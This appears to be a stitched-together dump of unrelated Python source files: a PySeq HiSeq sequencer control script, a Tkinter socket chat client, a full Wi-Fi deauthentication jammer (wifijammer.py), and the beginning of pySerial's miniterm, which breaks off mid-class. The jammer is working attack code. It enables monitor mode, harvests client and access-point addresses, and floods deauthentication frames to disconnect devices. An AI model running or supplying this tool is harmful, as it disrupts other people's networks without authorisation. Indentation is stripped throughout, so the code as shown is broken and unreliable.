hs.y.move(pos['y_initial'])
hs.x.move(pos['x_initial'])
hs.obj.move(obj_start)
n_tiles = pos['n_tiles']
n_frames = pos['n_frames']
# Set filters
for color in hs.optics.cycle_dict.keys():
filter = hs.optics.cycle_dict[color][fc.cycle]
            if color == 'em':
hs.optics.move_em_in(filter)
else:
hs.optics.move_ex(color, filter)
hs.message(msg + 'Start Imaging')
try:
scan_time = hs.scan(n_tiles, n_Zplanes, n_frames, image_name)
scan_time = str(int(scan_time/60))
hs.message(msg + 'Imaging completed in', scan_time, 'minutes')
except:
error('Imaging failed.')
# Reset filters
for color in hs.optics.cycle_dict.keys():
            if color == 'em':
hs.optics.move_em_in(True)
else:
hs.optics.move_ex(color, 'home')
if fc.IMAG_counter is not None:
fc.IMAG_counter += 1
hs.scan_flag = False
def WAIT(AorB, event):
"""Hold the flowcell *AorB* until the specfied event in the other flowell.
**Parameters:**
AorB (str): Flowcell position, A or B, to be held.
event: Event in the other flowcell that releases the held flowcell.
**Returns:**
int: Time in seconds the current flowcell was held.
"""
signaling_fc = flowcells[AorB].waits_for
cycle = str(flowcells[AorB].cycle)
start = time.time()
flowcells[signaling_fc].signal_event = event # Set the signal event in the signal flowcell
flowcells[signaling_fc].wait_thread.wait() # Block until signal event in signal flowcell
hs.message('PySeq::'+AorB+'::cycle'+cycle+'::Flowcell ready to continue')
flowcells[signaling_fc].wait_thread.clear() # Reset wait event
stop = time.time()
return stop-start
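# Hedged illustration (not original code) of the WAIT/signal handshake above,
# reduced to a single threading.Event shared by two flowcell threads:
#
#     gate = threading.Event()
#     def held_flowcell():          # plays the role of flowcells[AorB]
#         gate.wait()               # like flowcells[signaling_fc].wait_thread.wait()
#         print('released, recipe continues')
#     def signaling_flowcell():     # plays the role of flowcells[AorB].waits_for
#         print('signal event reached')
#         gate.set()                # like fc.wait_thread.set() in do_recipe()
#     threading.Thread(target=held_flowcell).start()
#     signaling_flowcell()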
def do_rinse(fc, port=None):
"""Rinse flowcell with reagent specified in config file.
**Parameters:**
fc (flowcell): The flowcell to rinse.
"""
method = config.get('experiment', 'method') # Read method specific info
method = config[method]
if port is None:
port = method.get('rinse', fallback = None)
AorB = fc.position
rinse = port in hs.v24[AorB].port_dict
if rinse:
LED(fc.position, 'awake')
# Move valve
hs.message('PySeq::'+AorB+'::Rinsing flowcell with', port)
fc.thread = threading.Thread(target = hs.v24[AorB].move, args = (port,))
fc.thread.start()
# Pump
port_num = hs.v24[AorB].port_dict[port]
if port_num in hs.v24[AorB].side_ports:
volume = fc.volume['side']
elif port_num == hs.v24[AorB].sample_port:
volume = fc.volume['sample']
else:
volume = fc.volume['main']
speed = fc.pump_speed['reagent']
while fc.thread.is_alive(): # Wait till valve has moved
pass
fc.thread = threading.Thread(target = hs.p[AorB].pump,
args = (volume, speed,))
else:
fc.thread = threading.Thread(target = do_nothing)
##########################################################
## Shut down system ######################################
##########################################################
def do_shutdown():
"""Shutdown the HiSeq and flush all reagent lines if prompted."""
for fc in flowcells.values():
while fc.thread.is_alive():
fc.wait_thread.set()
time.sleep(10)
LED('all', 'startup')
hs.message('PySeq::Shutting down...')
hs.z.move([0, 0, 0])
hs.move_stage_out()
do_flush()
##Flush all lines##
# LED('all', 'user')
#
# # flush_YorN = userYN("Flush lines")
# if flush_YorN:
# hs.message('Lock temporary flowcell on stage')
# hs.message('Place all valve input lines in PBS/water')
# input('Press enter to continue...')
#
# LED('all', 'startup')
# for fc in flowcells.keys():
# volume = flowcells[fc].volume['main']
# speed = flowcells[fc].pump_speed['flush']
# for port in hs.v24[fc].port_dict.keys():
# if isinstance(port_dict[port], int):
# hs.v24[fc].move(port)
# hs.p[fc].pump(volume, speed)
# ##Return pump to top and NO port##
# hs.p[fc].command('OA0R')
# hs.p[fc].command('IR')
# else:
# LED('all', 'user')
hs.message('Retrieve experiment flowcells')
    input('Press enter to finish shutting down')
for fc in flowcells.values():
AorB = fc.position
fc_log_path = join(hs.log_path, 'Flowcell'+AorB+'.log')
with open(fc_log_path, 'w') as fc_file:
for i in range(len(fc.history[0])):
fc_file.write(str(fc.history[0][i])+' '+
str(fc.history[1][i])+' '+
str(fc.history[2][i])+'\n')
# Turn off y stage motor
hs.y.move(0)
hs.y.command('OFF')
LED('all', 'off')
##########################################################
## Free Flowcells ########################################
##########################################################
def free_fc():
"""Release the first flowcell if flowcells are waiting on each other."""
# Get which flowcell is to be first
experiment = config['experiment']
    cycles = int(experiment.get('cycles'))
first_fc = experiment.get('first flowcell', fallback = 'A')
if len(flowcells) == 1:
fc = flowcells[[*flowcells][0]]
try:
fc.wait_thread.set()
except:
pass
fc.signal_event = None
else:
flowcells_ = [fc.position for fc in flowcells.values() if fc.total_cycles <= cycles]
if len(flowcells_) == 1:
            fc = flowcells[flowcells_[0]]
else:
fc = flowcells[first_fc]
flowcells[fc.waits_for].wait_thread.set()
flowcells[fc.waits_for].signal_event = None
    hs.message('PySeq::Flowcells are waiting on each other, starting flowcell',
fc.position)
return fc.position
def get_config(args):
"""Return the experiment config appended with the method config.
**Parameters:**
- args (dict): Dictionary with the config path, the experiment name and
the output path to store images and logs.
**Returns:**
- config: The experiment config appended with the method config.
"""
# Create config parser
config = configparser.ConfigParser()
    # Defaults that can be overridden
config.read_dict({'experiment' : {'log path': 'logs',
'image path': 'images'}
})
# Open config file
if os.path.isfile(args['config']):
config.read(args['config'])
else:
error('ConfigFile::Does not exist')
sys.exit()
# Set output path
config['experiment']['save path'] = args['output']
# Set experiment name
config['experiment']['experiment name'] = args['name']
# save user valve
USERVALVE = False
if config.has_section('reagents'):
valve = config['reagents'].items()
if len(valve) > 0:
USERVALVE = True
# Get method specific configuration
method = config['experiment']['method']
if method in methods.get_methods():
config_path, recipe_path = methods.return_method(method)
config.read(config_path)
elif os.path.isfile(method):
config.read(method)
recipe_path = None
elif config.has_section(method):
recipe_path = None
else:
error('ConfigFile::Error reading method configuration')
sys.exit()
# Check method keys
if not methods.check_settings(config[method]):
go = userYN('Proceed with experiment')
if not go:
sys.exit()
# Get recipe
recipe_name = config[method]['recipe']
if recipe_path is not None:
pass
elif os.path.isfile(recipe_name):
recipe_path = recipe_name
else:
error('ConfigFile::Error reading recipe')
config['experiment']['recipe path'] = recipe_path
# Don't override user defined valve
user_config = configparser.ConfigParser()
user_config.read(args['config'])
if USERVALVE:
config.read_dict({'reagents':dict(user_config['reagents'])})
if user_config.has_section(method):
config.read_dict({method:dict(user_config[method])})
return config
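# Hedged example (not original code) of the minimal config layout get_config()
# expects; the section and option names are inferred from the keys read above
# and are not exhaustive:
#
#     [experiment]
#     method = my_method        ; a built-in method, a config file path, or a section below
#     cycles = 3
#     first flowcell = A
#
#     [my_method]
#     recipe = my_recipe.txt
#
#     [reagents]
#     1 = PBS
#     2 = antibody_mix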
def check_fc_temp(fc):
"""Check temperature of flowcell."""
if fc.temperature is not None:
if fc.temp_timer is None:
fc.temp_timer = threading.Timer(fc.temp_interval, do_nothing)
fc.temp_timer.start()
if not fc.temp_timer.is_alive():
#print('checking temp')
T = hs.T.get_fc_T(fc.position)
hs.message(False, 'PySeq::'+fc.position+'::Temperature::',T,'°C')
fc.temp_timer = None
if abs(fc.temperature - T) > 5:
msg = 'PySeq::'+fc.position+'::WARNING::Set Temperature '
msg += str(fc.temperature) + ' C'
hs.message(msg)
msg = 'PySeq::'+fc.position+'::WARNING::Actual Temperature '
msg += str(T) + ' C'
hs.message(msg)
return T
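# Hedged note (not original code): the Timer in check_fc_temp() is used only as
# an "interval elapsed" flag -- a fresh timer is armed, and a reading is taken
# once it is no longer alive. The same rate-limiting idea in isolation:
#
#     _timer = None
#     def interval_elapsed(interval=60):
#         global _timer
#         if _timer is None:                        # arm a new interval
#             _timer = threading.Timer(interval, do_nothing)
#             _timer.start()
#         if not _timer.is_alive():                 # interval has expired
#             _timer = None                         # re-arm on the next call
#             return True                           # take a reading now
#         return False                              # still inside the interval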
###################################
## Run System #####################
###################################
args_ = args.get_arguments() # Get config path, experiment name, & output path
if __name__ == 'pyseq.main':
n_errors = 0
config = get_config(args_) # Get config file
logger = setup_logger() # Create logfiles
port_dict = check_ports() # Check ports in configuration file
first_line, IMAG_counter, z_planes = check_instructions() # Checks instruction file is correct and makes sense
flowcells = setup_flowcells(first_line, IMAG_counter) # Create flowcells
hs = configure_instrument(IMAG_counter, port_dict)
confirm_settings(z_planes)
hs = initialize_hs(IMAG_counter) # Initialize HiSeq, takes a few minutes
    if n_errors == 0:
flush_YorN = do_flush() # Ask to flush out lines
do_prime(flush_YorN) # Ask to prime lines
if not userYN('Start experiment'):
sys.exit()
# Do prerecipe or Initialize Flowcells
for fc in flowcells.values():
if fc.prerecipe_path:
fc.pre_recipe()
else:
fc.restart_recipe()
cycles_complete = False
while not cycles_complete:
stuck = 0
complete = 0
for fc in flowcells.values():
if not fc.thread.is_alive(): # flowcell not busy, do next step in recipe
do_recipe(fc)
if fc.signal_event: # check if flowcells are waiting on each other
stuck += 1
if fc.cycle > fc.total_cycles: # check if all cycles are complete on flowcell
complete += 1
check_fc_temp(fc)
if stuck == len(flowcells): # Start the first flowcell if they are waiting on each other
free_fc()
if complete == len(flowcells): # Exit while loop
cycles_complete = True
if hs.current_view is not None: # Show latest images in napari, WILL BLOCK
hs.current_view.show()
hs.current_view = None
do_shutdown() # Shutdown HiSeq
else:
error('Total number of errors =', n_errors)
def main():
pass
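# Hedged summary sketch (not original code) of the scheduler loop above: every
# flowcell owns one worker thread, and the main loop only polls it, advancing
# the recipe whenever that thread is idle:
#
#     while not cycles_complete:
#         for fc in flowcells.values():
#             if not fc.thread.is_alive():    # previous step finished
#                 do_recipe(fc)               # queue the next PORT/PUMP/HOLD/... step
#         # free_fc() breaks the deadlock when every flowcell is stuck in WAIT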
|
chat_client.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"Tkinter GUI chat client"""
import socket                # socket library
import threading             # thread handling
import tkinter as Tkinter    # GUI library (Python 3 module name; keeps the Tkinter.* calls below working)
#---- Build the socket ----
HOST = input('Host: ')
PORT = input('Port: ')
if not PORT:
PORT = 9999
else:
PORT = int(PORT)
BUFSIZE = 1024
ADDR = (HOST, PORT)
# Connect to the server with connect(); it takes the server address as an
# (IP, port) tuple, already stored in the ADDR variable.
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(ADDR)
def receive():
"""Maneja el recibo de mensajes."""
while True:
try:
            # Receive up to BUFSIZE bytes from the server and show them in the list box
            msg = client_socket.recv(BUFSIZE).decode('utf-8')
            msg_list.insert(Tkinter.END, msg)
except OSError:
break
def send(event = None):  # the event argument is passed by Tk binders
    """Handle sending messages."""
    msg = my_msg.get()
    my_msg.set("")  # clear the input field
    client_socket.send(msg.encode('utf-8'))
if msg == "quit":
        # Close the client socket instance
client_socket.close()
top.quit()
def on_closing(event = None):
"""Esta funcion se llama cuando se cierra la ventana"""
my_msg.set("quit")
send()
top = Tkinter.Tk()
top.title("Chat Me!")
messages_frame = Tkinter.Frame(top)
my_msg = Tkinter.StringVar()  # Holds the text of the outgoing message
my_msg.set("Escribe tu mensaje aqui.")
scrollbar = Tkinter.Scrollbar(messages_frame) # Scrollbar
# This will hold the received messages
msg_list = Tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side = Tkinter.RIGHT, fill = Tkinter.Y)
msg_list.pack(side = Tkinter.LEFT, fill = Tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = Tkinter.Entry(top, textvariable = my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = Tkinter.Button(top, text = "Enviar", command = send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
# Start the receive thread (it runs its target function in the background)
receive_thread = threading.Thread(target = receive)
receive_thread.start()
Tkinter.mainloop()  # Run the GUI event loop.
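# ---------------------------------------------------------------------------
# Hedged companion sketch (not part of the original script): a minimal broadcast
# server for testing this client locally on 127.0.0.1:9999. Save it as a
# separate file and start it before the client; all names are illustrative.
#
#     import socket, threading
#
#     def serve(host='127.0.0.1', port=9999, bufsize=1024):
#         srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#         srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#         srv.bind((host, port))
#         srv.listen(5)
#         clients = []
#         def handle(conn):
#             while True:
#                 data = conn.recv(bufsize)
#                 if not data:
#                     break
#                 for c in clients:                 # broadcast to every client
#                     c.sendall(data)
#             clients.remove(conn)
#             conn.close()
#         while True:
#             conn, _ = srv.accept()
#             clients.append(conn)
#             threading.Thread(target=handle, args=(conn,), daemon=True).start()
#
#     serve()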
|
wifijammer.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
import re
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i", "--interface", help="Choose monitor mode interface. By default script will find the most powerful interface and starts monitor mode on it. Example: -i mon5")
parser.add_argument("-c", "--channel", help="Listen on and deauth only clients on the specified channel. Example: -c 6")
parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", action='store_true')
parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", action='store_true')
parser.add_argument("-a", "--accesspoint", help="Enter the MAC address of a specific access point to target")
parser.add_argument("--world", help="N. American standard is 11 channels but the rest of the world it's 13 so this options enables the scanning of 13 channels", action="store_true")
return parser.parse_args()
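# Hedged usage examples (not original code), built only from the flags defined
# above; the script needs root and a wireless card that supports monitor mode:
#
#     sudo python wifijammer.py                          # hop channels, deauth everything seen
#     sudo python wifijammer.py -c 6 -m 10               # stay on channel 6, cap the list at 10 pairs
#     sudo python wifijammer.py -a 00:11:22:33:44:55 -d  # target one AP, directed deauths only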
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
interface = args.interface
monmode = start_mon_mode(interface)
return monmode
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
        if len(line) == 0: continue # Skip empty lines
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s down' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 12 if not args.world else 14
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
            if len(line) > 2: # iw dev shouldn't display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 15
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint not in [pkt.addr1, pkt.addr2]:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
if noise_filter(args.skip, pkt.addr1, pkt.addr2):
return
            # Control = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
        os.system('ifconfig %s down' % mon_iface)
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
        os.system('ifconfig %s down' % mon_iface)
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
miniterm.py
|
#!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
